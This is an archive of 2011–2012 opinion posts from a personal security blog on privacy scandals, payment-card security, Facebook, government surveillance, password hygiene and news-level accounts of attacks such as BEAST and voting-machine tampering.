Paranoid Security

Wallet Woes...

2012-02-19T18:22:00.000-08:00

Someone please help Google; their new payment service is a disaster. Personally I think the entire concept is crap.. People have more than enough payment options, do we really need yet another one? Also, cell phones have become somewhat of a digital Swiss Army knife; I'm not convinced that adding a credit card is great idea. With all the personal information people already carry around on their phones adding a way that they can also get robbed doesn't sound appealing.

Google claims that people are protected using this service on the basis that their app requires people to use a pin number to approve transactions. However, earlier this month, a flaw was revealed making it possible to crack the pin number if the phone had been rooted. While this may not seem like a big deal it's important to recognize that as many as one in five phones are estimated to be rooted, further many manufacturers now even provide instructions on how to root their devices. Google has even gone so far as to ban certain capabilities from rooted phones.

In an attempt to save face Google scrambled to fix the flaws in their wallet app as quickly as they emerged but I'm wondering if people will ever really use it? Everyone carries around a wallet with at least one or two debit / credit cards inside. You need ID in order to drive your car so it's not like we'll suddenly stop taking our physical wallets with us.. Until people were to start taking their credit cards out of their wallets (not likely) I can't really see smartphone payment systems ever taking off. It will take years before all the kinks are worked out and by then I'm not sure people will ever really trust them. I give it another 6 to 12 months before phones as payment devices fizzles out. We need more secure payment options!

BYOD: Bring Your Own Device

2012-01-24T17:49:00.000-08:00

So far in 2012 the term BYOD has been all the buzz. It seems like everywhere you look there's someone rambling on and on about the 'threat' organizations are facing as a result of the 'Bring Your Own Device' revolution. The interesting part however is that people have been so trained for years now to be scared of viruses and trojans that they're missing the real danger.

Yes, malware is and always will be a problem but have we yet seen a single piece of malware that can jump from smartphone to other devices on the network? Maybe but not that I'm aware of. Most smartphones and tablets today are based on ARM architecture meaning that a virus designed to infect a smartphone could not infect an x86 based PC. Now, that's not to say that the mobile virus / worm couldn't upload an altered version of itself to another system; again, it'll probably happen at some point but I haven't seen it yet.

But what about the 800lbs Gorilla in the room that everyone seems to miss? Smartphones & tablets are nothing but small computers. Yes, at an architectural level they run a bit differently but they are fully capable of doing everything that a laptop can do. Think about it, old laptops had less than a gig of RAM and a single core processor but were basically doing the exact same thing we use more powerful machines for today. Today's smartphones & tablets are even more powerful than some of these old laptops, so why for a minute would you think that an intelligent hacker couldn't use that platform to launch an attack?

No one suspects that you'll be hacking into their network when you attach to their WiFi using your smartphone or tablet- and that's exactly the problem. For months I've known that tools like BackTrack5 and Laika were developed specifically to run on ARM compatible processors. Then today, I saw this - an app developed specifically for penetration testing from a mobile platform. Finally, point & click hacking has arrived to the smartphone. My prediction is that this often overlooked point of entry will eventually get exploited BIG TIME, at which point people will suddenly wake up and take notice.. But at that point it'll be too late. The proverbial cat will be out of the bag and everyone else will be chasing their tails for another year trying to figure out how to plug the holes. Good times ahead boys & girls.

Reasons not to use Facebook...

2012-01-18T10:26:00.000-08:00

Last week Facebook was hit by yet another attack.. this time 45,000 accounts were compromised. The new worm was actually a mutation of two separate attacks merged into one. As with most social media malware, common sense prevails as the main source of prevention. Don't click on links from people you don't know... Don't open attachments that are posted on your wall.

Here are my top three reasons why you should avoid using Facebook.

First, of course, would be the threats and vulnerabilities. Facebook has a ridiculous number of users making it a prime target for any attacker. Every couple of months there's a new outbreak plaguing users. With so many people on the site there are tons of unsophisticated users who do not know any better an will break common sense rules on what's good practice v. not. There's a damn good chance that you're connected to a couple of these people which in turn puts you at risk. Facebook does deserve credit for initiating a bug bounty program however in my opinion their bounties are far too low to be considered enticing.

Second is privacy- do people you haven't talked to in years really need to know personal information about your daily life? Obviously not. Privacy has been a major issue for Facebook and one of their main sources of pain. Unlike other companies Facebook's attitude towards their members is not always the most ethical and has on occasion landed them in hot water. As if that weren't enough it's a major source of info for bad guys everywhere. While I understand the nature of 'social' networking however there's also this thing called 'social' engineering. Guess what? Facebook is a one-stop-shop for a lot of these types of reconnaissance operations.

Third and final reason is time. Facebook is a time suck and completely drains people's productivity. Let's say that on average a person were to spend an average 20 minutes per day on Facebook (with Smartphones and people using it from the office I'm sure we can agree that this is an extremely conservative estimate). So 20 minutes x 365 days in a year = 7,300 minutes / 1440 minutes in a day = 5.05 days per year. That's right ladies and gents, just 20 minutes per day adds up to over 5 entire days of your year wasted on Facebook gathering useless information about people that likely don't really matter.

I remember a world before Facebook and I miss it...

Shame on Symantec

2012-01-12T11:37:00.000-08:00

Corporations never cease to amaze me... Just when I think I've heard it all a new scam pops up. Although this time, it's not so much the scam as the culprit that surprised me. Everyone knows (or at least should know) that there are tons of fake anti-virus applications trolling the internet. These programs are highly unethical and prey on the elderly and uninformed. Over the holiday break a family friend called me complaining that he could no use his laptop due to an antivirus program demanding his credit card... My friend is over 70 years old and knows just enough about computers to be dangerous (literally). The application had basically locked him out of his own computer claiming that it was infected and should not be used (irony?).

Luckily he hadn't provided them with his information and instead brought me the computer to remove the rouge app (Windows AntiVirus 2012). Now I'd heard of these applications before however this was my first encounter with seeing it live. Removing the application was not terribly difficult but was definitely not something my friend would have been able to do himself. Upon removing I decided to do a bit of forensic analysis to figure out how he'd gotten the infection. Turns out he hadn't update his Flash player and had downloaded an exploit, this was used to install a trojan which then called home to download and install the software.

Obviously the practice of installing unsolicited software is illegal / unethical. However apparently the concept of tricking consumers into thinking their clean system is infected is somewhat of a grey area. Symantec, one of world's largest and most trusted security firms has apparently decided to use similar trickery to swindle people out of their hard earned money. This is unbelievable. How could a company as large as Symantec stoop to such a low? Thankfully a lawsuit (currently seeking class-action status) has been filed against Symantec bringing the issue to light. According to the lawsuit, the software actually tells consumers of problems that don't really exist in attempt to sell the full version which will 'fix' the problems.

Hopefully this is a lesson learned for all vendors that these types of sales practices are not to be tolerated. Shame on you Symantec, I hope the courts make an example out of you.

Give Credit

2011-12-31T21:22:00.000-08:00

Everyone knows that credit and ATM cards are insecure, yet for some reason, credit card companies in the USA are very reluctant to switch over from the traditional 'swipe and sign' cards most Americans carry in their wallets every day. The question is why-- after all, isn't having a more secure system which can limit fraud in the best interest of everyone? More secure technology has existed existed for several years around the world and initially debuted in the US almost two years ago. In fact, we've been hearing for months now that this technology is coming, yetthe Payment Card Industry is refusing to implement it in the USA due to the increased costs associated with the switch.

For the past several years throughout Europe a new type of credit card known as 'chip and pin' have been adopted as the new de facto standard. These new cards work using an embedded SIM processor rather than encoding encrypted data on a magnetic strip. When making a purchase, the buyer simply enters a PIN code at the point of sale terminal rather than signing a receipt. This 5+ digit pin number serves as authentication mechanism; authorization is still performed in the traditional manner (internet connection to the issuing bank) however the account data is obtained from the SIM chip. The concept is that accessing the data stored on the SIM chip should be more difficult (and hence more secure). The technology is becoming more main stream stream and now there's even an iPhone/iPad app + device available for it.

Recently I decided to call my credit card companies and request an updated more secure credit card. I specifically requested that they provide me with a card without RFID (wave-pay) that incorporated chip and pin technology. My excuse was that I expected to travel to Europe (where swipe and sign is no longer accepted) next year however in all honesty I just wanted to see what they'd say. To my surprise, both companies (Visa from my local bank and American Express) denied my request stating that they did not have this technology available to US customers. This is pretty disappointing and actually somewhat scary- my fear is that by the time this technology is deployed in the US, it will already be obsolete / cracked and easily circumvented. In fact, a simple Google search reveals very interesting new devices which could prove extremely useful to tech-savvy criminals aiming to stay ahead of the curve...

[CENSORED]

2011-12-22T14:14:00.000-08:00

Over the last week or so there have been numerous stories related to the pending 'piracy prevention' bills currently before congress. For those of you who are not familiar: SOPA is the 'Stop Online Piracy Act' and PIPA is the 'Protect IP Act.' At first glance these bills may sound perfectly logical and acceptable- I mean, piracy is after all stealing. The problem however is the content proposed in these bills is more about censorship of the internet than about protecting intellectual property rights. Further, because these bills allow for censorship they violate the First Amendment and are therefore unconstitutional.

The gist of the proposed laws are that if the owner of a piece of content (movie/record company) were to discover a website hosting a pirated copy of their content (movie/mp3), the content owner would have the authority (without any legal oversight) to remove the URL from DNS listings. SOPA in particular would make it a felony to stream pirated content online or use applications such as TOR to circumvent the blockade. Civil liberties aside, the problem with these bills are that they create a vehicle by which censorship of the internet in the United States becomes extremely easy.

It will be interesting to see if these bills are discussed as part of the upcoming presidential campaign debates as they provide tough position to any politician regardless of what side their on. The good news however is that these stories do appear to be getting some attention, in part due to public criticism on the part of various celebrities. Also, tech giants like Google, Wikipedia & Facebook have been very active in fighting the good fight against these bills. Do your part - educate people about these bills - the more public attention and controversy surrounding these bills, the less likely they are to get passed.

Living in America

2011-12-12T17:42:00.000-08:00

Well, that didn't take very long.. Turns out my 'conspiracy theory' was dead on- guess that means I'm not as loony as originally thought. The folks over at MuckRock.com filed a Freedom of Information Act request regarding Carrier IQ and received an interesting response from the FBI. Turns out the FBI doesn't want to comply with the federal law and has refused to supply the requested information on grounds that it could disrupt investigations they've currently got in progress.

Sometimes being right feels good; sometimes it's a little sad. In this instance it's hard to feel good about being right. What's going on America? The feds are stealing your personal privacy and no one is standing up to stop them. Now don't get me wrong, I'm all for LE being afforded every resource necessary to catch bad guys and terrorist.

I do however take issue when they do it at the expense of our civil liberties. Search warrants were created for a reason- using techniques such as this are just a way around the law.

2012 is an election year, yet somehow I doubt that issues like this will ever be raised. I mean, how can they when there are so many 'important' issues already on the table? Wake up people!

It could happen to you..

2011-12-09T09:45:00.001-08:00

Conspiracy Theory

2011-12-06T21:26:00.001-08:00

So by now I'm sure everyone is aware of the Carrier IQ scandal that broke last week. In case you've been living under a rock it turns out that several telcos have been spying on their customers by installing rootkits on smartphones.

Now I'm seeing stories that the great senator from Minnesota is causing a ruckus and demanding that the software manufacturer, handset makers and carriers all come clean about their involvement. Personally I think this is nothing more than political theater however it is nice to finally see someone stand up for personal privacy. Unfortunately I don't think we're going to see a single conviction come out of this witch hunt.

At the risk of sounding like a total nut-job I'd like to propose a theory: Carrier IQ was a federally sanctioned operation under the PATRIOT Act.The Department of Homeland Security (or any one of numerous other federal agencies) enlisted the help of internet service providers and telcos so that they could maintain tabs on communication networks; Carrier IQ is how they did it.

Now before you go writing me off as a loon think about it for a minute. We know for a fact that DHS has requested ISPs help in the past for tracking down botnets and stopping the spreading of malware. We also know that the FBI worked with wireless carriers to monitor network traffic sent through their towers. Why then would it be so hard to believe that Carrier IQ is nothing more than a secret program never intended to be disclosed to the public? After all, we didn't find out about it from the telcos, handset manufacturers or software companies but from a lowly security researcher who initially thought it was a piece of malware.

I believe this whole mess is a government program gone wrong. The only way we'll know for sure though is if any convictions get handed down. I expect we'll see plenty more of the political drama in the press and on TV (politicians love headlines). However if no one gets convicted, it's because they had a get out of jail free card signed by the feds.

(Me on the weekends)

Leaky Pipes

2011-12-01T13:55:00.001-08:00

Lately I've been seeing an increasing number of reports around the idea that personal information is being leaked online. This does not surprise me as it's a well known fact that digital information is inherently insecure; what is surprising however is the blatant disregard for privacy on the part of the data owners.

Take for example mobile phone carriers. It's no secret that ISPs (and mobile carriers) have been mining DNS queries from their users to sell to market research firms for years. It is surprising however that mobile carriers would intentionally install rootkits onto their customers phones in order to log data. This is an obvious invasion of privacy and I hope that AT&T + Sprint are raked over the coals for it; although I would settle for some form of vigilante justice in this case. (Anonymous to the rescue!)

But that's not the half of it. Turns out that some researchers at Standford have discovered that consumer websites (Wall Street Journal, NBC, HomeDepot to name a few) are all leaking out user's information to marketing companies. I'd always been under the impression that this was illegal without disclosure however it seems that companies have found a loophole. In fact, according to a recent WikiLeaks article, this type of data mining is all too common. Corporations are looking to make money any way they can- morality comes later. Stories like this are great as they bring to light issues that would otherwise go unnoticed. Consumers need to be aware that these unethical tactics are being used regularly and hold corporations responsible.

So now you're so worried about privacy that you're bordering on paranoid schizophrenia. Well, be careful what you tell your shrink as that information may eventually wind up on the net too. Turns out that medical data breaches have been on the rise lately- to the tune of 96% of providers surveyed reporting a breach in the last 2 years. Good thing doctors make us sign arbitration agreements.. I wonder if those cover data compromises?

Someone call a plumber; the Internet is leaking.

Buyer Beware

2011-11-27T10:05:00.001-08:00

Now that Black Friday has passed, Cyber Monday (week?) is upon us! I must admit, I was at some point tempted to buy useless junk that I did not need. After all, that's really what people do on these after-holiday shopping days.. Sure the stores tell us the shopping is for Christmas presents however in reality most people are likely buying things for themselves (would be interested to see an honest survey on this). At any rate, the 'specials' this year (and last?) were not really all that special, basically just a small additional markdown on top of everyday prices- hardly enough incentive to get me out of bed early; I've already got a laptop and TV.

Criminals have become savvy to these holidays and are poisoning search engines with malware filled sites that promise shoppers exclusive holiday deals. This scam has been around for a while however it is interesting to see the adaptation to current events / popular culture. After all, who can resist a $75 iPad?! Personally I think its just a matter of time before cable news networks get a hold of these stories and begin their campaign of fear. That will solve some of the problem however a few grandmothers are still likely to get caught up in it.

As if that weren't enough, a new phishing scam has been making the rounds this year where people are sent an email claiming to be a $50 iTunes gift card. Once the unwitting victim opens the attachment, their system becomes infected and well, another one bites the dust. Again, this is nothing new- phishing and malware infected attachments have been around for a very long time- everyone knows these things exist. People need to understand that just because it's the holidays does not mean they can let their guard down. Common sense still reigns supreme.

So now the news media has convinced you that shopping online is no longer safe so you decide to head off to the mall. Turns out that the mall has its own set of problems... While doing some holiday shopping in downtown London with her three children a woman was confronted with threat of a different type. Turns out that the internet content filtering at the Currys department store wasn't up to par resulting in the iPads on demo to display hardcore porn to for shoppers to enjoy. The store has apologized for the trauma the woman and her children endured however the damage is done.

On top of everything else, shopping malls now want to track your every movement using the unique RF signal given off by your mobile phone. Select malls have began setting up sensors at various points in the mall and collecting 'marketing data' to know where shoppers are going during their shopping expeditions. Of course the mall has graciously informed shoppers that the system is 'completely anonymous.' If shoppers don't speak up by boycotting malls employing this technology it'll just be a matter of time before it winds up in every mall in the country.

Do yourself a favor- give cash! It's the most wonderful time of the year...

UPDATE 11.28.11: Mall Owners Have Agreed to Kill Their Tracking Program

Brave New World

2011-11-23T07:59:00.001-08:00

The Wall Street Journal recently published an article detailing the booming 'electronic surveillance' industry since 9/11. In the last 10 years, the number of private firms offering hacking tools to world governments has grown from virtually nothing to a whopping $5B industry. Obviously governments now recognize the value of information however interestingly enough, the companies selling these products refuse to acknowledge who their customers are.

Without a doubt it is unethical for someone to use a zero-day exploit to install a trojan with key-logger on your computer. However, what if this were done by a governmental agency; does that make it OK? The question of ethics is obviously something to address here since now governments are employing tactics typically used by criminals to spy on their own citizens. In the United States we do have some protections however as warrants are typically required before any evidence can be collected. Also, if the company is based out of the US export restrictions prohibit the sale of espionage products to blacklisted countries.

However, if the company producing such equipment (or software) were headquartered in a country without export restrictions, well then game on. Now don't think for a second that all countries have strictly controlled export lists for classifying such tools. In fact, in the United Kingdom, such laws restrictions currently do not exist- meaning that if one were to develop a 'legitimate' less than ethical tool, he could then profit by selling the tool to a rogue state, say Iran (for example), where the tool could then be used against the citizens of said country without any repercussions.

Unfortunately the bottom line here is that really nothing is safe, laptops, desktops, mobile platforms and even cloud resources are all susceptible targets. As if worrying about criminals trying to steal personal information weren't enough, we've now got to be concerned about governments abusing their powers for 'the greater good.' Realistically most people probably have nothing interesting that criminals or governments would really want - but that really is not the point here. The point is that spying on people without their knowledge is unethical and illegal, just because a 3 letter well funded organization is behind the attack does not make it OK.

Bad Apple

2011-11-13T22:47:00.001-08:00

At BlackHat Japan in 2008, Charlie Miller disclosed a vulnerability in the way MacOS handled sandboxing applications. Charlie had found out that Apple's definition of sandboxing was a little different than that of the rest of the world resulting in a false sense of security for the user. Instead of applications being restricted to their own distinct memory address space, malicious code could potentially be used to spawn new processes outside of the 'sandbox.'

In response to the findings, Apple responded by modifying their operating system (at the time) so that the vulnerability could not be triggered. Well, it turns out that 3 years later, Apple still hasn't learned to fix the issue. In September 2011 researchers from Core Security published a report to Apple detailing vulnerabilities in MacOS' sandboxing mechanism which was very similar to that which Charlie Miller had reported several years earlier. The difference however, is that this time Apple has chosen to not address the issue.

These revelations come just weeks ahead of Apple's proposed launch of the new Mac Store, where users can purchase and install applications on their laptop and desktop systems, similar to how iPhones do today. As if this weren't bad enough, last week Apple actually banned Charlie Miller from their software development program for disclosing a bug in iOS which would allow an 'Apple Approved' AppStore download to execute unsigned (and potentially malicious) code on the iPhones & iPad platforms.

This goes to show that Apple really is not interested in providing a secure product but only with profits. Personally, I suspect Apple is trying to keep this all hush-hush as to not worry their fan base however in my opinion, the approach is borderline negligent. Apple has no problem launching a service whereby they stand to rake in millions of dollars however does not want to take the time to repair their operating systems security flaws first. For a company to neglect to issue a patch and then 'punish' a security researcher for disclosing a flaw in their system is absolutely asinine. Apple is playing with fire; it is no longer a questions of 'if' but only 'when' they will answer for their actions.

Keep Your Friends Close

2011-11-09T17:08:00.000-08:00

In September of this year TED published a speech given by Misha Glenny on why businesses should hire hackers to manage their security systems. During the talk, Glenny discusses several examples of hackers that were found on the wrong side of the law. The part of this story that I found interesting however, is that most of these attackers had a warped sense of justice. The logic goes, that since most of these hackers gained their computer skills as young teenagers, their sense of right vs. wrong hadn't fully formed yet. All of the people discussed in the report served time in prison however most stated that had they ever been offered legitimate jobs in computer security, they wouldn't have resorted to criminal activity.

Apparently the message has been heard as federal agencies and defense contractors have began looking to the hacker community for the best and brightest. In exchange for services rendered, said hacker receives a steady paycheck and more importantly, isn't busy causing mischief. Personally I'm all for these types of recruiting efforts as they create a paradigm shift among young generations.Ten years ago, the FBI attended Black Hat to arrest people on their naughty list- this year they had a booth and were accepting applications..

Corporations should too adopt similar policies to encourage hackers to use their skills for good rather than evil. Bug bounty programs are a great example of how we can change the mentality that 'hackers are bad.' Companies like Google, Mozilla, and even FaceBook have all taken a proactive approach to bettering their own security while rewarding white hats for their efforts. Programs like this are good for the industry and for the hacker community, after all, we've tried the alternative and that obviously hasn't worked...

Illegal Search & Seizure

2011-11-04T14:13:00.000-07:00

According to the Fourth Amendment, any US government agency wishing to collect evidence against a suspect is required to obtain a search warrant based upon credible intelligence. Any 'evidence' gathered without said warrant is inadmissible in court and therefore cannot be used to convict a suspect. This seems perfectly reasonable and is taught to children across the USA as early as 6th grade.

Unfortunately, it seems the FBI does not like this part of the constitution and instead has opted to put a system in place to spy on cellular communications without ever seeking a warrant. The system generically known as 'stingray' is essentially a Man-in-the-Middle attack against CDMA cellular networks. By setting up rogue towers (access-points) to look like legitimate provider towers, unknowing citizens connect to the FBI's tower and transmit their telephone conversations / data which is then relayed to the actual tower.

Despite being illegal and evil, the system does sound pretty ingenious; I mean, realistically no one ever verifies whether the tower they're connected to is actually run by their provider. The problem I have however is that based upon the affidavit filed by Special Agent Bradley Morrison, head of the 'Tracking Technology Unit,' the FBI logged a TON of data on people who were not under investigation (basically everyone that connected to the rogue tower). The implications are that an ongoing investigation could potentially identify interesting information about a completely different person (who was not on the FBI's radar).

Once again, this story will get practically zero media exposure, meaning a legitimate debate on the legality will likely never see the light of day. I imagine most American's would probably have a lot to say about this if the story ever aired on CNN! This is clearly a case for the ACLU as it directly violates the rights of innocent citizens; let's hope someone from their office catches whiff of it and decides to fight the good fight.

War Games

2011-10-30T23:34:00.000-07:00

October 2007: An American imaging satellite floating thousands of miles above the Earth is attacked interfering with NASA communications capabilities. After over ten minutes of communications loss, NASA engineers are finally able to regain control of the satellites, however no one really knows what occurred to cause the transmission loss. After a year long investigation into the source of the 'glitch' it becomes apparent that this accident, was no accident...

One year later, a second American imaging satellite is again attacked resulting in a similar communications loss. After a thorough investigation, the attacks are traced back to a ground station in Norway. Two additional attacks will occur in the next few years with similar effect. As intelligence agencies scramble to protect the eyes-in-the-sky it becomes apparent that the attackers are much more sophisticated than usual. These hackers are skilled, well funded and well trained- they know the systems well and have penetrated layers of defenses to gain access.

October 2009: Northrop Grumman publishes a report to the US-China Economic & Security Commission detailing the capabilities of the Chinese government to conduct cyber warfare and computer network exploitation. In the report Northrop lists espionage as the main driving factor in motivating state-sponsored attacks such as these.

Based upon the investigation conducted when writing the report, the attacks may have been preventable had proper security mechanisms been put into effect. According to the report:
"These operations are succeeding in part because current industry and US
government information security paradigms are largely based on reactive
controls such as traditional signature-based anti-virus vendor models,
common host and network defensive measures that are often inadequate
against advanced attackers."

This story is a good example of what can happen when security is not taken seriously and properly implemented. On one hand I can sympathize with the victim; they tried to protect their assets. Problem is their attackers were trying harder. Lesson learned: No system is unbreakable; with enough determination and time anything can be compromised.

The Will of the People

2011-10-23T18:38:00.000-07:00

Last month, the 'Vulnerability Assessment Team' from Argonne National Laboratories released a report indicating that modern electronic voting machines could easily be compromised. The attack is implemented through a hardware bypass requiring about $10 worth of parts and an 8th grade education level of electronics. The team went on to describe how for an additional $16 a wireless system could be integrated to allow the attacker to sit as far as a 1/2 mile from the voting booth.

What's interesting about this attack, is that its virtually impossible to detect. The attacker would only need access to the voting equipment for a few minutes in order to install the device, then again return after the election to retrieve the device. Since most voting booths are located at elementary schools and in church basements, getting access to the devices before an election is somewhat trivial. If a group of attackers were clever, they could send in a few folks a few minutes before polls close to retrieve the hardware, or simply volunteer to work the election at that time.

In the past, most attempts at corrupting electronic voting systems relied upon installing a piece of software, kind of like a virus of sorts, which could easily be detected later. Since this is a hardware man-in-the-middle bypass, once the hardware has been removed from the machine, it is impossible to detect. Once again, this story has not received nearly the amount of media attention it deserves. It is curious that something this important would fall by the wayside and not be reported on...

Thomas Jefferson once said 'The will of the people is the only legitimate foundation of any government, and to protect its free expression should be our first object.' Unfortunately it looks like modern politicians have no intentions of protecting democracy by outlawing electronic voting machines (probably because they rely on these systems to get elected in the first place). Hopefully people will wise up to realize that these machines are not at all safe and will refuse to use them come election day.

Give Hash a Chance

2011-10-21T12:06:00.000-07:00

It recently occurred to me that most people probably have no idea what a cryptographic hash is or what it's used for. For those of you that don't know, a hash is simply a one way mathematical computation that provides a unique signature to ensure the hashed item has not been tampered with. Hashes are used for two purposes really, to verify the integrity of files (as discussed here) and as a method of security transmitting passwords without actually sending the password (I'll discuss this another day...).

Wouldn't it be great if web browser developers educated the masses on the importance of verifying hash values on files they download? Think about it - Microsoft, Mozilla, Google, Apple - all they'd really have to do is input a small script to compute MD5 or SHA-1 values on files after they've been downloaded and display a message to the user showing the calculated value. The value could be displayed right in the download window allowing users to easily see the hash next to the file name.

People would inevitably wonder what that weird string of characters next to their file name is. From there hash education would be born. As more consumers became savvy to what hash values are used for they'd begin to demand web sites publish the hash values of files they're posting. The amount of infected files downloaded would then decline as more people were educated.

Now I understand this method is not fool proof, for one, if someone were to get access to a webserver to post an infected file, he could undoubtedly also post the corresponding hash value. Despite that, this would still be a nice start down the long road of security awareness for the masses..

And then there were lawsuits...

2011-10-17T10:02:00.000-07:00

Facebook is being sued in Federal court for violating US wiretapping laws. Now, I must admit that when I first heard this I was a little bit surprised. I mean, how dumb could they be? Facebook is a billion dollar empire with an army of lawyers, surely they wouldn't do something this heinous. Well it turns out they would... A woman in Mississippi is seeking class action status in her lawsuit which accuses Facebook for monitoring users browser habits even when they are logged out of the website.

Ever wonder how Facebook knows what advertisements to display when you're logged in spying on your friends? Well apparently they're doing so by tracking your activity on the web. The lawsuit specifically focuses on the 'like' buttons that users click when logged out of Facebook however I personally think the abuse is much more wide-spread. It really makes you wonder what the company would do if no one ever reported the problem?

Facebook has had numerous complaints of questionable morals in the past however this appears to be a new low. Of course, this story will likely get swept under the rug like so many other violations of personal privacy often are. The sad fact of the matter is, that without a lawsuit with serious financial repercussions Facebook will likely get a slap on the wrist and claim it was an accident. Even if the complaint is proven in court and Facebook is found guilty, I highly doubt we'd ever see prison terms issued to their corporate staff... Let's hope the lawsuit gets the class action status they seek and that each user gets a nice check sent to them. Perhaps then companies like Facebook will learn that this type of behavior is more costly than worthwhile.

Google 2 Form Authentication !

2011-10-16T17:47:00.000-07:00

So I just found out that Google is now offering 2 form authentication for Gmail users. Two form authentication basically means that Google will require a one time password or token each time someone attempts to access their gmail account. In this case, Google will send out a text message with the one time password. That way, if someone were to actually figure out your password, they still couldn't access your Google account without also having your phone.

Now this may seem excessive to some but I personally live out of my Gmail account. I've literally got thousands of emails archived and often rely on the search functionality for contacts or account information. I've signed up for the service and have started using it; I gotta admit- I am very impressed. Way to go Google, this is great! In addition to the one time token for webmail access, Google will also provide one time passwords (mine was 16 characters..) that enable you to link Google services to other devices, like an Android phone. The passphrase gets saved on the device however can be revoked at any time.

For anyone using Gmail or any other type of Google applications, I highly suggest that you take advantage of this feature and enroll in the two form authentication. The token can be saved for up to 30 days per browser for anyone who finds typing in a code each time they access their webmail from their home computer annoying. The nice thing however, is that any other web browser used to access the account would require a unique token.

To enable the feature log into your gmail account, click on 'Account Settings' then 'Using 2 Step Verification' in the middle of the page. The process is rather painless provided that you've already got a cell phone number linked to you gmail account (who doesn't?).

This is where you go to enroll...

Each time you log in, you'll see the below prompt and receive a text message with the one time token.

Good v. Good Enough

2011-10-13T09:20:00.001-07:00

When it comes to security I find that there are two wildly different philosophies on what is needed. Some organizations take the approach that security is a headache which they are required to deal with, often as an afterthought to whatever project they just completed, I'll refer to these as type A's. Type B organizations on the other hand recognize security as a critical component of everything they do and often consider security related issues throughout implementation of various operations.

From what I've seen, most companies today are type A organizations. They often put into place half-assed attempts to provide the illusion of security and never really worry about what would happen if their systems or processes were to fail. For a type A organization security just needs to be good enough that in the event of a breach, executives don't appear negligent.

Type A organizations often wind up victims of various attacks and are always in react mode until something serious happens like a lawsuit for losing customers personal information. When that happens, type A organizations typically experience extreme growing pains and panic as they begin hiring 'experts' who attempt to fix their broken systems. At that point a type A begins to understand why type B's put so much energy into always bring secure.

Security should never be an afterthought, it should be a fundamental pillar of every product or project that companies put together. It's important that companies understand the differences and benefits of having good security instead of just good enough.

Published with Blogger-droid v1.7.4

They Broke the Internet...

2011-10-11T23:24:00.000-07:00

Last month a couple of researches from Buenos Aires figured out how to exploit SSL 3.0 & TLS 1.0 using an application they've dubbed 'BEAST' (browser exploit against SSL/TLS). Now while this may be old news for some, its amazing to me that more of the major news media outlets haven't picked up on this story. While it's true that this is a same-side attack (meaning it cannot be administered remotely...yet) almost every website out there today is running TLS 1.0 or SSL 3.0. Banks, credit card companies, corporate webmail servers... they're all vulnerable.

The attack works by leveraging a well known 'theoretical' vulnerability that had never actually been proven. I guess in my eyes that means it is also theoretically possible that someone somewhere (NSA? Mossad?) has known about this exploit for a very long time and never said anything. After all, if you were one of the bad guys- why would you want anyone to know that you had that level of access? Like-wise, if you were one of the 'good guys' why cause any panic or let the bad guys know that it's even possible...

Either way, this story definitely needs more coverage. Most people probably won't care but there should be some increased pressure put on the owners of vulnerable web servers to fix the issue (upgrade to TLS 1.1 or greater). There's a certain amount of due diligence and ethics that should be adhered to when people are entrusting you with their livelihoods.. The sad fact is however, that the fix has literally existed for years (before the exploit was even discovered!) yet most browsers and website didn't bother updating their software. Consumers deserve high quality security- at least there are some good hackers out there standing up for what's right...

p@s5W0rd$

2011-10-10T22:42:00.000-07:00

A couple of weeks ago a friend of mine had asked me to 'fix' his computer due to the typical Windows behavior. Upon receiving the laptop he immediately entrusted me with his corporate account password. I was taken back, wow, talk about trust.. but even more interesting was the simplicity of his password. When I asked him about it, he informed me that the password was the same one the IT department had assigned him months before that. At first I thought he was just messing with me but upon further discussion I learned that he was completely serious, and worse than that, he looked at me like I was from Mars when I told him I used a different password for every application I used.

At that moment it occurred to me that I needed to sit down and have a serious chat with my friend about the importance of having a strong password. I mean, its pretty obvious isn't it? Don't use the same password for multiple logins, mix letters with upper and lower case, use numbers and symbols, make sure its at least 10 characters long. Pick a word, substitute in symbols for vowels, throw in a few upper case letters here or there, add a couple digits to the beginning, end or middle and viola, strong password.

Single sign on is nice for ease of use but if I were to set a policy I'd prohibit it from being used. Sorry sales dude or corporate suit, you're gonna have to play by the same rules as everyone else. Last week there was an article published claiming that by using CUDA technology, researchers were able to crack a 6 character password in just 4 seconds... Increasing to 8 characters took 4 hours - still not too shabby in my eyes.. Sure, this is all being done as a same side attack meaning no system needs to respond to each attempt but its still pretty damn impressive.

I guess what surprises me most is that even to this day, people still don't recognize how easy it is to steal someone's identity or clean out their bank account. Having a crappy password is just begging someone to mess with you. Unfortunately, I bet a lot of people out there are just like my friend... Hopefully I'm wrong and nothing bad ever does happen to him but then again, why risk it? I mean, a little bit of inconvenience or muscle memory isn't such a bad thing- especially when you consider the consequences of getting pwned.

So sitting here, writing this post its occurred to me that un any given day I probably go through at least 10 unique passwords depending on what I'm doing. First, when I turn on the laptop, the system bios prompts me. Then, when the OS loads, I enter password number 2... Next I load up my Windows VM and sign into the corporate network- password 3.. Personal email - #4... SalesForce.com - #5... this blog - #6.. bank account - #7.. ebay #8... paypal #9.. twitter #10... pandora #11... wireless ssid #12.. I could go on but I think you get my point.. I guess if I counted them all I'd say I've probably got at least 20-30 passwords floating around in my head at any given time..

Sure I forget one or two from time to time (especially right after changing them...) but I guess that comes with the territory.. at least it helps me sleep good each night.

Who needs ethics?

2011-10-09T12:15:00.000-07:00

So I just read a couple of interesting articles..

Seems that the DHS has now developed psychic powers and can identify criminals before crimes are actually committed. If you ask me, this seems like a form of racial profiling applied to hackers.

In Florida, the Washington County public school system has decided to begin fingerprinting all elementary school children. The program is intended to aide with roll call as students climb onto the big yellow bus. What could possibly go wrong?

Ethics aside, I do not see how either of these actions are constitutional. ACLU where are you?

Privacy is dead.

2011-10-08T19:54:00.000-07:00

For the last few years I've been becoming more and more leery of technology. I mean, really, this whole being connected 24x7 thing is great up to a certain point, but after a while it kindof get old. The more people get hooked into the web the more they share about their personal lives and the less they care about privacy. I can't help but feel like the feds are taking full advantage of this situation and adding to their ever growing databases on everyday citizens.

Ten years ago, the PATRIOT act was passed allowing for unprecedented changes to personal freedom, of course these changes were intended to be temporary but no one seemed to care when it got renewed. People seem totally clueless; it's really sad when you think about it. As if standing up for civil liberties were somehow unpatriotic? What a joke.. Some one has got to take a stand and call a spade a spade. If we continue to give up these little inches eventually we'll find ourselves where the sidewalk ends.

